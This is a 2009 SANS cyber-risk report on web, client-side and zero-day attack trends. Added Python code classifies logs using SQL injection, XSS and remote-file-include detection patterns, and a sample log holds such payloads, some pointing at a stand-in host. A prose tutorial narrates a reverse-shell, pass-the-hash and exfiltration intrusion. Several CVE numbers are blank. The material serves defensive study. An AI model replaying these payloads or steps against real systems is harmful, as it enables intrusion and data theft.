The Top Cyber Security Risks
Two risks dwarf all others, but organizations fail to mitigate them


Featuring attack data from TippingPoint intrusion prevention systems protecting 6,000 organizations, vulnerability data from 9,000,000 systems compiled by Qualys, and additional analysis and tutorial by the Internet Storm Center and key SANS faculty members.

September 2009

Contents

Executive summary
Overview
Vulnerability exploitation trends
    Application vulnerabilities exceed OS vulnerabilities
    Web application attacks
    Windows: Conficker/Downadup
    Apple: QuickTime and six more
    Origin and destination analysis for four key attacks
    Application patching is much slower than operating system patching
Tutorial: Real-life HTTP client-side exploitation example
    Step 0: Attacker places content on trusted site
    Step 1: Client-side exploitation
    Step 2: Establish reverse shell backdoor using HTTPS
    Steps 3 and 4: Dump hashes and use pass-the-hash attack to pivot
    Step 5: Pass the hash to compromise domain controller
    Steps 6 and 7: Exfiltration
Zero-day vulnerability trends
Best practices in mitigation and control of the top risks
Critical Controls - As Applied to HTTP Server Threats

Executive Summary

Priority One: Client-side software that remains unpatched.

Waves of targeted attacks, often called spear phishing, are exploiting client-side vulnerabilities in commonly used programs such as Adobe PDF Reader, QuickTime, Adobe Flash and Microsoft Office. This is currently the primary initial infection vector used to compromise computers that have Internet access. Those same client-side vulnerabilities are exploited by attackers when users visit infected web sites (see Priority Two below for how the web sites are compromised). Because the visitors feel safe downloading documents from the trusted sites, they are easily fooled into opening documents, music and video that exploit client-side vulnerabilities. Some exploits do not even require the user to open documents: simply accessing an infected website is all that is needed to compromise the client software. The victims' infected computers are then used to propagate the infection and compromise other internal computers and sensitive servers incorrectly thought to be protected from unauthorized access by external entities. In many cases, the ultimate goal of the attacker is to steal data from the target organizations and also to install back doors through which the attackers can return for further exploitation.

On average, major organizations take at least twice as long to patch client-side vulnerabilities as they take to patch operating system vulnerabilities. In other words, the highest priority risk is getting less attention than the lower priority risk.

Priority Two: Internet-facing web sites that are vulnerable.

Attacks against web applications constitute more than 60% of the total attack attempts observed on the Internet. These vulnerabilities are being exploited widely to convert trusted web sites into malicious websites serving content that contains client-side exploits. Web application vulnerabilities such as SQL injection and Cross-Site Scripting flaws in open-source as well as custom-built applications account for more than 80% of the vulnerabilities being discovered. Despite the enormous number of attacks and despite widespread publicity about these vulnerabilities, most web site owners fail to scan effectively for the common flaws and become unwitting tools used by criminals to infect the visitors that trusted those sites to provide a safe web experience.

Operating systems continue to have fewer remotely-exploitable vulnerabilities that lead to massive Internet worms. Other than Conficker/Downadup, no new major worms for OSs were seen in the wild during the reporting period. Even so, the number of attacks against buffer overflow vulnerabilities in Windows tripled from May-June to July-August and constituted over 90% of attacks seen against the Windows operating system.

Rising numbers of zero-day vulnerabilities.

World-wide there has been a significant increase over the past three years in the number of people discovering zero-day vulnerabilities, as measured by multiple independent teams discovering the same vulnerabilities at different times. Some vulnerabilities have remained unpatched for as long as two years. There is a corresponding shortage of highly skilled vulnerability researchers working for government and software vendors. So long as that shortage exists, the defenders will be at a significant disadvantage in protecting their systems against zero-day attacks.

A large decline in the number of PHP File Include attacks appears to reflect improved processes used by application developers, system administrators, and other security professionals.

Overview

Throughout the developed world, governments, defense organizations, and companies in finance, power, and telecommunications are increasingly targeted by overlapping surges of cyber attacks from criminals and nation-states seeking economic or military advantage. The number of attacks is now so large and their sophistication so great that many organizations are having trouble determining which new threats and vulnerabilities pose the greatest risk and how resources should be allocated to ensure that the most probable and damaging attacks are dealt with first. Exacerbating the problem is that most organizations do not have an Internet-wide view of the attacks.

This report uses current data covering March 2009 to August 2009 from appliances and software in thousands of targeted organizations to provide a reliable portrait of the attacks being launched and the vulnerabilities they exploit. The report's purpose is to document existing and emerging threats that pose significant risk to networks and the critical information that is generated, processed, transmitted, and stored on those networks. This report summarizes vulnerability and attack trends, focusing on those threats that have the greatest potential to negatively impact your network and your business. It identifies key elements that enable these threats and associates these key elements with security controls that can mitigate your risk. The report's target audience is major organizations that want to ensure their defenses are up-to-date and are tuned to respond to today's newest attacks and to the most pressing vulnerabilities.

Data on actual attacks comes from intrusion prevention appliances deployed by TippingPoint that protect more than 6,000 companies and government agencies. Data on vulnerabilities that remain unpatched comes from appliances and software deployed by Qualys that monitor vulnerabilities and configuration errors in more than 9,000,000 systems, scanned more than 100,000,000 times so far. The patterns in the data are vetted by the senior staff at the Internet Storm Center and by the faculty of the SANS Institute responsible for SANS programs in hacker exploits, penetration testing, and forensics. In other words, these findings reflect a fusion of data and experience never before brought together.

The report also includes a pictorial description/tutorial on how some of the most damaging current attacks actually work. One of the most important findings in cybersecurity over the past several years has been the understanding, most often asserted by White House officials, that offense must inform defense. Only people who understand how attacks are carried out can be expected to be effective defenders. The tutorial shows what actually happened in a very damaging attack and is excerpted from Ed Skoudis' SANS Hacker Exploits and Incident Handling class. It is included to boost defenders' understanding of current attack techniques.

The report was compiled by Rohit Dhamankar, Mike Dausin, Marc Eisenbarth and James King of TippingPoint with assistance from Wolfgang Kandek of Qualys, Johannes Ullrich of the Internet Storm Center, and Ed Skoudis and Rob Lee of the SANS Institute faculty.

Vulnerability Exploitation Trends

Application Vulnerabilities Exceed OS Vulnerabilities

During the last few years, the number of vulnerabilities being discovered in applications has been far greater than the number discovered in operating systems. As a result, more exploitation attempts are recorded against application programs. The most popular applications for exploitation tend to change over time, since the rationale for targeting a particular application often depends on factors like prevalence or the inability to patch it effectively. Due to the current trend of converting trusted web sites into malicious servers, browsers and the client-side applications that can be invoked by browsers seem to be consistently targeted.

Figure 1: Number of Vulnerabilities in Network, OS and Applications

Web Application Attacks

There appear to be two main avenues for exploiting and compromising web servers: brute-force password guessing attacks and web application attacks. Microsoft SQL, FTP, and SSH servers are popular targets for password guessing attacks because of the access that is gained if a valid username/password pair is identified. SQL Injection, Cross-site Scripting and PHP File Include attacks continue to be the three most popular techniques used for compromising web sites. Automated tools, designed to target custom web application vulnerabilities, make it easy to discover and infect several thousand web sites.

Windows: Conficker/Downadup

Attacks on Microsoft Windows operating systems were dominated by Conficker/Downadup worm variants. For the past six months, over 90% of the attacks recorded for Microsoft targeted the buffer overflow vulnerability described in the Microsoft Security Bulletin MS. Although in much smaller proportion, Sasser and Blaster, the infamous worms from 2003 and 2004, continue to infect many networks.

Figure 2: Attacks on Critical Microsoft Vulnerabilities (last 6 months)

Figure 3: Attacks on Critical Microsoft Vulnerabilities (last 6 months)

Apple: QuickTime and Six More

Apple has released patches for many vulnerabilities in QuickTime over the past year. QuickTime vulnerabilities account for most of the attacks that are being launched against Apple software. Note that QuickTime runs on both Mac and Windows operating systems. The following vulnerabilities should be patched for any QuickTime installations: CVE , CVE , CVE

Figure 4: Attacks on Critical Apple Vulnerabilities (last 6 months)

Origin and Destination Analysis for Four Key Attacks

Over the past six months, we have seen some very interesting trends when comparing the country where various attacks originate to the country of the attack destination. In order to show these results, we have characterized and presented the data in relation to the most prevalent attack categories. The analysis performed for this report identified these attack categories as high-risk threats to most if not all networks, and as such they should be at the forefront of security practitioners' minds. These categories are Server-Side HTTP attacks, Client-Side HTTP attacks, PHP Remote File Include, Cross-site Scripting attacks, and finally SQL Injection attacks. As you might expect, there is some overlap in these categories, with the latter three being subsets of the first two. However, the trends we see in separating this data are worth pointing out.

The SQL Injection attacks that compose this category include SQL Injection using SELECT SQL Statement, SQL Injection Evasion using String Functions, and SQL Injection using Boolean Identity. The most prominent PHP Remote File Include attack is one that looks for a very small HTTP request that includes a link to another website as a parameter and contains a very specific evasion technique used by a number of attacks to increase their reliability. Also of note is a very specific attack against the Zeroboard PHP application, the only single application that made the top attacks. The final type of attack included in these statistics is one of the more popular HTTP Connect Tunnel attacks, which remains a staple in the Server-Side HTTP category. HTTP connect tunnels are used for sending spam e-mails via mis-configured HTTP servers.

Looking at the breakdown by country we see that the United States is by far the major attack target for the Server-Side HTTP attack category (Figure 5).

Figure 5: Server-Side HTTP Attacks by Destination Country (last 6 months)

For years, attack targets in the United States have presented greater value propositions for attackers, so this statistic really comes as no surprise. An interesting spike in Server-Side HTTP attacks occurred in July. This was entirely due to SQL Injection attacks using the SELECT command. Upon looking at the data, we saw a massive campaign by a range of IP addresses located at a very large Internet Service Provider (ISP). In this case, there were a number of machines located at a single colocation site that may have all been compromised through the same vulnerability due to the machines being at the same patch level. In addition, a number of gambling sites took part in this attack, which peaked after hours on July Fourth, a major holiday in the United States.

Figure 6: Server-Side HTTP Attacks (last 6 months)

Finally, let's turn to the source of these HTTP Server-Side Attacks (Figure 7).

Figure 7: Server-Side HTTP Attacks by Source Country (last 6 months)

Here we see the United States as by far the largest origin, which is a pattern that has continued for some time. In many cases we believe these to be compromised machines that are then being used for further nefarious purposes. The next four offenders on the HTTP Server-Side attacking countries list are Thailand, Taiwan, China, and the Republic of Korea. They also show up in other portions of this report, so this graph will be a useful reference in comparing some of the other attack categories and their relative magnitude.

The last six months have seen a lot of activity with SQL injection attacks. Some typical patterns emerge, with the United States being both the top source of and destination for SQL Injection events. SQL Injection on the Internet can more or less be divided into two sub-categories: Legitimate SQL Injection and Malicious SQL Injection. Many web applications on the Internet still use SQL Injection for their normal functionality. It should be noted that this is only a difference in intent: the web applications that legitimately use SQL Injection are guaranteed to be vulnerable to the tools and techniques used by attackers to perform Malicious SQL Injection. The servers that house these applications may have a higher compromise rate, not only because they are known to be vulnerable, but also because legitimate and malicious injects must be told apart before an attack can be identified.

Figure 8: SQL Injection Attacks by Destination Country (last 6 months)

Looking at the magnitude of these attacks broken down by month (Figure 9), we see the large-scale SQL Injection campaign pointed out in the Server-Side HTTP Attack section. A very large spike in SQL Injection attacks in July was caused mostly by an online advertiser who distributed code to many affiliates using SQL injection as functionality. The application was quickly pulled, resulting in a large drop in events for the month of August.

Figure 9: SQL Injection Attacks (last 6 months)

The source distribution of many of these attacks is much more diverse than the destination. China is now the single largest source outside of the United States. Again, the overwhelming destination for these events is the United States (Figure 10).

Figure 10: SQL Injection Attacks by Source Country (6 months)

In conclusion, we cannot overstate the importance of protecting DMZ-based web applications from SQL Injection attacks. Increasingly, the ultimate objective of attackers is the acquisition of sensitive data. While the media may consistently report attacker targets as being credit cards and social security numbers, that is more due to the popular understanding of the marketability of this data. They are not the only valuable data types that can be compromised. Since SQL Injection attacks offer such easy access to data, it should be assumed that any valuable data stored in a database accessed by a web server is being targeted.

Although PHP File Include attacks have been popular, we have seen a notable decline in the overall number of attacks that have taken place. With the exception of a major attack campaign originating from Thailand in April, the number of PHP File Include attacks in August is less than half the March/May average. There are many ways to protect against these attacks. Apache configuration, input sanitization, and network security equipment are all very good at deterring these attacks, so it seems likely that the drop in total attacks is at least partly due to a positive response by application developers, system administrators, and security professionals. However, due to the extreme ease with which these attacks are carried out, and the enormous benefit of a successful attack (arbitrary PHP code is executed), attacks such as these are likely to remain popular for some time.

Figure 11: PHP Remote File Include Attacks (last 6 months)

Let us look at the sources of PHP Remote File Include attacks. A major attack campaign was launched out of Thailand in April that caused Thailand to show up at number 1 in this list.

Figure 12: PHP Remote File Include Attacks by Source Country (6 months)

Cross Site Scripting (XSS) is one of the most prevalent bugs in today's web applications. Unfortunately, developers often fall into the trap of introducing XSS bugs while creating custom code that connects all of the diverse web technologies that are so prevalent in today's Web 2.0 world. Another very common use of XSS is by various advertisers' analytics systems. For example, an advertiser's banner might be embedded in a web page which is set up to reflect some JavaScript off of the advertiser's HTTP server for tracking purposes. However, in this case there is little risk because the site in question (usually) has full control over its own page, so this request to the advertiser is not generally malicious. It is the reflection attacks, along with attacks that leverage flaws in form data handling, that make up the vast majority of XSS attacks that we have seen in the last six months.

Figure 13: XSS Attacks by Source Country (last 6 months)
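As an added illustration (not code from the report), the following Python classifies web server request lines into the categories counted in the SQL Injection, PHP Remote File Include, Cross Site Scripting and HTTP Connect Tunnel discussion above; the log lines, paths and addresses are constructed, and the CHAR() signature for string-function evasion is an assumption about what that category matches.

```python
"""Classify web server requests into the attack categories this report counts.
Added example (not from the report); log lines, hosts and addresses are
constructed. Only the request line is inspected, so it runs on any combined-
format access log."""
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Apache/nginx combined log format: ip ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3}) (?P<size>\S+)'
)

# SQL injection: SELECT statements, Boolean identities (1=1) and string-function
# evasion (CHAR() is assumed here as the typical function).
SQLI_RE = re.compile(
    r"\b(union\s+(all\s+)?select\b|select\b.+\bfrom\b|or\s+\d+\s*=\s*\d+|char\s*\(\s*\d+)", re.I)
# Reflected cross-site scripting: script tags, javascript: URLs, event handlers.
XSS_RE = re.compile(r"(<\s*script\b|javascript\s*:|\bon(?:load|error|mouseover)\s*=)", re.I)
# PHP remote file include: a parameter whose value is a URL to another server.
RFI_RE = re.compile(r"^(?:https?|ftp)://", re.I)


def decode(value, rounds=3):
    """Undo repeated percent-encoding, a common way to evade one-pass matching."""
    for _ in range(rounds):
        new = unquote_plus(value)
        if new == value:
            break
        value = new
    return value


def classify(method, target):
    """Return the attack categories a single request line falls into."""
    if method == "CONNECT":
        # A proxy tunnel request arriving at a web server, used to relay spam.
        return ["http_connect_tunnel"]
    query = urlsplit(target).query
    values = [decode(v) for _, v in parse_qsl(query, keep_blank_values=True)]
    whole = decode(target)
    cats = []
    if any(RFI_RE.match(v.strip()) for v in values):
        cats.append("php_remote_file_include")
    if SQLI_RE.search(whole):
        cats.append("sql_injection")
    if XSS_RE.search(whole):
        cats.append("cross_site_scripting")
    return cats or ["benign"]


def analyse(lines):
    """Count categories overall and per (source address, category)."""
    by_cat, by_src = Counter(), Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for cat in classify(m["method"], m["target"]):
            by_cat[cat] += 1
            if cat != "benign":
                by_src[(m["ip"], cat)] += 1
    return by_cat, by_src


# Constructed sample log (documentation address ranges, invented paths).
SAMPLE_LOG = """\
203.0.113.5 - - [04/Jul/2009:23:41:07 -0400] "GET /products.asp?id=1;SELECT+name+FROM+sysobjects HTTP/1.1" 200 5120
203.0.113.5 - - [04/Jul/2009:23:41:09 -0400] "GET /products.asp?id=1%20or%201%3D1 HTTP/1.1" 200 5120
198.51.100.77 - - [05/Jul/2009:01:02:03 -0400] "GET /index.php?page=http://198.51.100.77/c.txt HTTP/1.1" 200 310
198.51.100.77 - - [05/Jul/2009:01:02:05 -0400] "GET /board/index.php?dir=http%3A%2F%2F198.51.100.77%2Fs.txt HTTP/1.0" 404 210
192.0.2.10 - - [05/Jul/2009:02:00:00 -0400] "GET /search.php?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 800
192.0.2.11 - - [05/Jul/2009:02:05:00 -0400] "CONNECT mail.example.net:25 HTTP/1.1" 200 -
192.0.2.12 - - [05/Jul/2009:02:06:00 -0400] "GET /index.php?page=about HTTP/1.1" 200 1024
"""

if __name__ == "__main__":
    totals, per_source = analyse(SAMPLE_LOG.splitlines())
    for cat, n in totals.most_common():
        print(f"{cat:26s} {n}")
    for (ip, cat), n in sorted(per_source.items()):
        print(f"{ip:15s} {cat:26s} {n}")
```

As the report notes, a match says nothing about intent: an application that passes SQL in its parameters by design trips the same signatures, so per-source and per-application counts need review before they are treated as attacks.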

Attacks sourced from the United States have been on a steady decline month-over-month. The Republic of Korea has seen a 50% reduction in the last 30 days. These two events, however, have been offset by a sudden 20% increase in the last 30 days in attacks from Australia. The other three major players, namely Hong Kong, China and Taiwan, have remained stable over the past three monthly periods in this category.

Application Patching is Much Slower than Operating System Patching

Qualys scanners collect anonymized data on detected vulnerabilities to capture the changing dynamics in the vulnerability assessment field. The data documents changes such as the decline of server-side vulnerabilities and the corresponding rise of vulnerabilities on the client side, both in operating system components and applications. A Top 30 ranking is often used to see if major changes occur in the most frequent vulnerabilities found. Here is the ranking for the first half of 2009, edited to remove irrelevant data points such as 0-day vulnerabilities.
Description
WordPad and Office Text Converters Remote Code Execution Vulnerability (MS09-010)
Sun Java Multiple Vulnerabilities ( and others)
Sun Java Web Start Multiple Vulnerabilities May Allow Elevation of Privileges (238905)
Java Runtime Environment Virtual Machine May Allow Elevation of Privileges (238967)
Adobe Acrobat and Adobe Reader Buffer Overflow (APSA09-01)
Microsoft SMB Remote Code Execution Vulnerability (MS09-001)
Sun Java Runtime Environment GIF Images Buffer Overflow Vulnerability
Microsoft Excel Remote Code Execution Vulnerability (MS09-009)
Adobe Flash Player Update Available to Address Security Vulnerabilities (APSB09-01)
Sun Java JDK JRE Multiple Vulnerabilities (254569)
Microsoft Windows Server Service Could Allow Remote Code Execution (MS08-067)
Microsoft Office PowerPoint Could Allow Remote Code Execution (MS09-017)
Microsoft XML Core Services Remote Code Execution Vulnerability (MS08-069)
Microsoft Visual Basic Runtime Extended Files Remote Code Execution Vulnerability (MS08-070)
Microsoft Excel Multiple Remote Code Execution Vulnerabilities (MS08-074)
Vulnerabilities in Microsoft DirectShow Could Allow Remote Code Execution (MS09-028)
Microsoft Word Multiple Remote Code Execution Vulnerabilities (MS08-072)
Adobe Flash Player Multiple Vulnerabilities (APSB07-20)
Adobe Flash Player Multiple Security Vulnerabilities (APSB08-20)
Third Party CAPICOM.DLL Remote Code Execution Vulnerability
Microsoft Windows Media Components Remote Code Execution Vulnerability (MS08-076)
Adobe Flash Player Multiple Vulnerabilities (APSB07-12)
Microsoft Office Remote Code Execution Vulnerability (MS08-055)
Adobe Reader JavaScript Methods Memory Corruption Vulnerability (APSA09-02 and APSB09-06)
Microsoft PowerPoint Could Allow Remote Code Execution (MS08-051)
Processing Font Vulnerability in JRE May Allow Elevation of Privileges (238666)
Microsoft Office Could Allow Remote Code Execution (MS08-016)
Adobe Acrobat/Reader util.printf() Buffer Overflow Vulnerability (APSB08-19)
Adobe Acrobat and Adobe Reader Multiple Vulnerabilities (APSB08-15)
Windows Schannel Security Package Could Allow Spoofing Vulnerability (MS09-007)

Table 1: Qualys Top 30 in H

Some of the vulnerabilities listed in the table get quickly addressed by IT administrators; vulnerabilities in the base operating system class, for example, show a significant drop in even the first 15 days of their lifetime:

Figure 14: Microsoft OS Vulnerabilities

But at least half of the vulnerabilities in the list, primarily vulnerabilities found in applications, receive less attention and get patched on a much slower timeline. Some of these applications, such as Microsoft Office and Adobe Reader, are very widely installed and so expose the many systems they run on to long-lived threats. The following graphs plot the number of vulnerabilities detected for Microsoft Office and Adobe Reader, normalized to the maximum number of vulnerabilities detected in the timeframe. Periodic drops in detection rates occur during weekends, when scanning focuses on servers rather than desktop machines and the detection rates of vulnerabilities related to desktop software fall accordingly.
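An added worked example (constructed data, not the Qualys data set) of the measurement described above: daily detection counts normalized to the maximum in the window, weekend scan days dropped, and the number of days until detections halve compared between an operating-system and an application vulnerability; the 10- and 30-day decay half-lives are assumed inputs.

```python
"""Patch-cycle measurement on daily vulnerability detection counts.
Added example with constructed data; the decay half-lives are assumed, not
taken from the report."""
from datetime import date, timedelta


def synth_series(days, half_life, peak=1000, start=date(2009, 1, 5), weekend_factor=0.4):
    """Constructed counts: detections decay from `peak` with the given half-life,
    and weekend scans see only a fraction because desktops are scanned less."""
    series = []
    for d in range(days):
        day = start + timedelta(days=d)
        n = peak * 0.5 ** (d / half_life)
        if day.weekday() >= 5:  # Saturday, Sunday
            n *= weekend_factor
        series.append((day, int(round(n))))
    return series


def normalise(series, skip_weekends=True):
    """(day, count / maximum count) pairs, optionally without weekend points."""
    kept = [(day, n) for day, n in series if not (skip_weekends and day.weekday() >= 5)]
    peak = max(n for _, n in kept)
    return [(day, n / peak) for day, n in kept]


def days_to_fraction(series, fraction=0.5, skip_weekends=True, sustained=True):
    """Days after the first observation until normalised detections fall to
    `fraction` of the peak. With sustained=True the level must stay at or below
    the threshold for the rest of the window, so a one-off weekend dip does not
    count as patching. Returns None if the threshold is never reached."""
    norm = normalise(series, skip_weekends)
    first_day = norm[0][0]
    for i, (day, f) in enumerate(norm):
        if f <= fraction and (not sustained or all(g <= fraction for _, g in norm[i:])):
            return (day - first_day).days
    return None


def patch_lag_ratio(app_series, os_series):
    """How many times longer the application vulnerability takes to halve."""
    app_days, os_days = days_to_fraction(app_series), days_to_fraction(os_series)
    if app_days is None or not os_days:
        return None
    return app_days / os_days


# Constructed: an OS flaw halving in 10 days, an application flaw in 30 days.
OS_VULN = synth_series(60, half_life=10)
APP_VULN = synth_series(60, half_life=30)

if __name__ == "__main__":
    print("naive first dip (weekend artefact):",
          days_to_fraction(OS_VULN, skip_weekends=False, sustained=False))
    print("OS days to half:", days_to_fraction(OS_VULN))
    print("application days to half:", days_to_fraction(APP_VULN))
    print("ratio:", patch_lag_ratio(APP_VULN, OS_VULN))
```

Reading the first dip without weekend handling reports the Saturday scan gap as if half the machines had been patched in five days; the sustained, weekday-only reading recovers the real 10- and 30-day figures.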

Figure 15: Microsoft PowerPoint and Adobe Vulnerabilities Patching Cycles

Attackers have long picked up on this opportunity and have switched to different types of attacks in order to take advantage of these vulnerabilities, using social engineering techniques to lure end-users into opening documents received by e-mail, or by infecting websites with links to documents that have attacks for these vulnerabilities embedded. These infected documents are not only placed on popular web sites that have a large number of visitors, but increasingly target the long tail: the thousands of specialized websites that have smaller but very faithful audiences. By identifying and exploiting vulnerabilities in the Content Management Systems used by these sites, attackers can automate the infection process and reach thousands of sites in a matter of hours. Attacks using PDF vulnerabilities have seen a large increase in late 2008 and 2009 as it became clear to attackers how easy it is to use this method of getting control over a machine.

Adobe Flash has similar problems with the application of its updates; there are four Flash vulnerabilities in our Top 30 list that date back as far as 2007:

Figure 16: Flash Vulnerabilities

Flash presents additional challenges: it does not have its own automatic update mechanism, and one needs to patch Internet Explorer in a separate step from other browsers. For users that have more than one browser installed, it is quite easy to forget to completely close Flash vulnerabilities and to remain unwittingly vulnerable.

One of the other software families that is high on the Top 30 list is Java, which is widely installed for running Java applets in the common browsers and also, increasingly, for normal applications. It is quite slow in the patch cycle, with actually increasing numbers of total vulnerabilities, as the introduction of new vulnerabilities outweighs the effect of patching. Java has the additional problem that until recently new versions did not uninstall the older code, but only pointed default execution paths to the new, fixed version; attack code could be engineered to take advantage of the well-known paths and continue to use older and vulnerable Java engines.

Figure 17: Sun Java Vulnerabilities

Tutorial: Real Life HTTP Client-side Exploitation Example

This section illustrates an example of a real-life attack conducted against an organization that resulted in loss of critical data for the organization. In this attack, Acme Widgets Corporation suffered a major breach from attackers who were able to compromise their entire internal network infrastructure using two of the most powerful and common attack vectors today: exploitation of client-side software and pass-the-hash attacks against Windows machines.

Step 0: Attacker Places Content on Trusted Site

In Step 0, the attacker begins by placing content on a trusted third-party website, such as a social networking, blogging, photo sharing, or video sharing website, or any other web server that hosts content posted by public users. The attacker's content includes exploitation code for unpatched client-side software.

Step 1: Client-Side Exploitation

In Step 1, a user on the internal Acme Widgets enterprise network surfs the Internet from a Windows machine that is running an unpatched client-side program, such as a media player (e.g., RealPlayer, Windows Media Player, iTunes), a document display program (e.g., Acrobat Reader), or a component of an office suite (e.g., Microsoft Word, Excel, PowerPoint). Upon receiving the attacker's content from the site, the victim user's browser invokes the vulnerable client-side program, passing it the attacker's exploit code. This exploit code allows the attacker to install or execute programs of the attacker's choosing on the victim machine, using the privileges of the user who ran the browser. The attack is partially mitigated because this victim user does not have administrator credentials on this system. Still, the attacker can run programs with those limited user privileges.

Step 2: Establish Reverse Shell Backdoor Using HTTPS

In Step 2, the attacker's exploit code installs a reverse shell backdoor program on the victim machine. This program gives the attacker command shell access to the victim machine, communicating between this system and the attacker using outbound HTTPS access from victim to attacker. The backdoor traffic therefore appears to be regular encrypted outbound web traffic as far as the enterprise firewall and network are concerned.

Steps 3 & 4: Dump Hashes and Use Pass-the-Hash Attack to Pivot

In Step 3, the attacker uses shell access to the initial victim system to load a local privilege escalation exploit program onto the victim machine. This program allows the attacker to jump from the limited-privilege user account to full system privileges on this machine. Although vendors frequently release patches to stop local privilege escalation attacks, many organizations do not deploy such patches quickly, because such enterprises tend to focus exclusively on patching remotely exploitable flaws. The attacker now dumps the password hashes for all accounts on this local machine, including a local administrator account on the system.

In Step 4, instead of cracking the local administrator password, the attacker uses a Windows pass-the-hash program to authenticate to another Windows machine on the enterprise internal network, a fully patched client system on which this same victim user has full administrative privileges. Using NTLMv1 or NTLMv2, Windows machines authenticate network access for the Server Message Block (SMB) protocol based on user hashes and not the passwords themselves, allowing the attacker to get access to the file system or run programs on the fully patched system with local administrator privileges. Using these privileges, the attacker now dumps the password hashes for all local accounts on this fully patched Windows machine.

Step 5: Pass the Hash to Compromise Domain Controller

In Step 5, the attacker uses a password hash from a local account on the fully patched Windows client to access the domain controller system, again using a pass-the-hash attack to gain shell access on the domain controller. Because the password for the local administrator account is identical to the password for a domain administrator account, the password hashes for the two accounts are identical. Therefore, the attacker can access the domain controller with full domain administrator privileges, giving the attacker complete control over all other accounts and machines in that domain.
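An added defender's-side model of Steps 3 to 5 (not from the report or the class it excerpts): each host records which password hashes an intruder with SYSTEM privileges could dump there and which hashes authenticate as an administrator on it, and reachability over that inventory gives the blast radius of the credential reuse that turned one workstation into a domain compromise. Host names, account names and hash labels are constructed.

```python
"""Blast radius of credential reuse, modelling Steps 3 to 5 of the tutorial from
the defender's side. Added example, not from the report or the SANS class;
host names, account names and hash strings are constructed placeholders."""
from collections import deque

# Constructed inventory. "dumpable": account -> password hash an intruder with
# SYSTEM privileges could dump on that host (local accounts, logged-on users).
# "admins": hashes that authenticate as an administrator on that host.
# Hash strings are labels, not real NT hashes.
HOSTS = {
    "ws-victim": {                      # Steps 1-3: foothold, privilege escalation
        "dumpable": {"alice": "H_alice", "Administrator": "H_localadmin_1"},
        "admins": {"H_localadmin_1"},
    },
    "ws-patched": {                     # Step 4: alice is a local admin here
        "dumpable": {"Administrator": "H_localadmin_2", "svc_backup": "H_svc"},
        "admins": {"H_alice", "H_localadmin_2"},
    },
    "dc01": {                           # Step 5: domain admin uses the same password
        "dumpable": {"DomainAdmin": "H_localadmin_2", "krbtgt": "H_krbtgt"},
        "admins": {"H_localadmin_2"},
    },
    "fileserver": {                     # Step 6: reachable once domain admin is held
        "dumpable": {"Administrator": "H_fs"},
        "admins": {"H_fs", "H_localadmin_2"},
    },
    "isolated-ws": {                    # no shared credentials at all
        "dumpable": {"Administrator": "H_iso"},
        "admins": {"H_iso"},
    },
}


def blast_radius(hosts, start):
    """Hosts reachable from `start` by dumping hashes on each compromised host and
    replaying any hash that is an administrator credential elsewhere.
    Returns (compromised host set, dict host -> hash that opened it)."""
    compromised, opened_by, harvested = {start}, {start: None}, set()
    queue = deque([start])
    while queue:
        host = queue.popleft()
        harvested |= set(hosts[host]["dumpable"].values())
        for other, info in hosts.items():
            if other in compromised:
                continue
            usable = info["admins"] & harvested
            if usable:
                compromised.add(other)
                opened_by[other] = min(usable)
                queue.append(other)
    return compromised, opened_by


def shared_admin_hashes(hosts):
    """Hashes that are administrator credentials on more than one host, i.e. the
    password reuse that turned one workstation into a domain compromise."""
    where = {}
    for host, info in hosts.items():
        for h in info["admins"]:
            where.setdefault(h, []).append(host)
    return {h: sorted(hs) for h, hs in where.items() if len(hs) > 1}


def with_unique_admin_passwords(hosts):
    """Inventory after giving every host its own administrator password: each
    shared admin hash is replaced by a per-host placeholder wherever it occurs."""
    shared = shared_admin_hashes(hosts)

    def fix(host, h):
        return f"H_{host}_unique" if h in shared else h

    return {
        host: {
            "dumpable": {acct: fix(host, h) for acct, h in info["dumpable"].items()},
            "admins": {fix(host, h) for h in info["admins"]},
        }
        for host, info in hosts.items()
    }


if __name__ == "__main__":
    reached, how = blast_radius(HOSTS, "ws-victim")
    print("reachable:", sorted(reached))
    print("reused admin hashes:", shared_admin_hashes(HOSTS))
    fixed = with_unique_admin_passwords(HOSTS)
    print("after unique passwords:", sorted(blast_radius(fixed, "ws-victim")[0]))
```

With the shared administrator password removed, the same foothold still reaches the workstation where the victim user is an administrator, but the domain controller and file server drop out of the blast radius.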

Steps 6 and 7: Exfiltration

In Step 6, with full domain administrator privileges, the attacker now compromises a server machine that stores secrets for the organization. In Step 7, the attacker exfiltrates this sensitive information, consisting of over 200 Megabytes of data. The attacker pushes this data out to the Internet from the server, again using HTTPS to encrypt the information, minimizing the chance of it being detected.

Zero-Day Vulnerability Trends

A zero-day vulnerability occurs when a flaw in software code is discovered and code exploiting the flaw appears before a fix or patch is available. Once a working exploit of the vulnerability has been released into the wild, users of the affected software will continue to be compromised until a software patch is available or some form of mitigation is taken by the user.

File format vulnerabilities continue to be the first choice for attackers to conduct zero-day and targeted attacks. Most of the attacks continue to target Adobe PDF, Flash Player and Microsoft Office Suite (PowerPoint, Excel and Word) software. Multiple publicly available fuzzing frameworks make it easier to find these flaws. The vulnerabilities are often found in 3rd-party add-ons to these popular and widespread software suites, making the patching process more complex and increasing their potential value to attackers.

The notable zero-day vulnerabilities during the past 6 months were:

Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE )
Microsoft Office Web Components ActiveX Control Code Execution Vulnerability (CVE )
Microsoft Active Template Library Header Data Remote Code Execution Vulnerability (CVE )
Microsoft DirectX DirectShow QuickTime Video Remote Code Execution Vulnerability (CVE )
Adobe Reader Remote Code Execution Vulnerability (CVE )
Microsoft PowerPoint Remote Code Execution Vulnerability (CVE )

The ease of finding zero-day vulnerabilities is a direct result of an overall increase in the number of people world-wide having the skills to discover vulnerabilities. This is evidenced by the fact that TippingPoint DVLabs often receives the same vulnerabilities from multiple sources. For example, MS (Microsoft Internet Explorer DOM Object Heap Overflow Vulnerability) was discovered independently by three researchers. The first researcher submitted this remote IE 6/7 critical vulnerability on Oct 22. A second independent researcher submitted the same vulnerability on April 23. A third independent researcher submitted the same vulnerability on May 19. All three submissions outlined different approaches to auditing for and finding the same vulnerability.

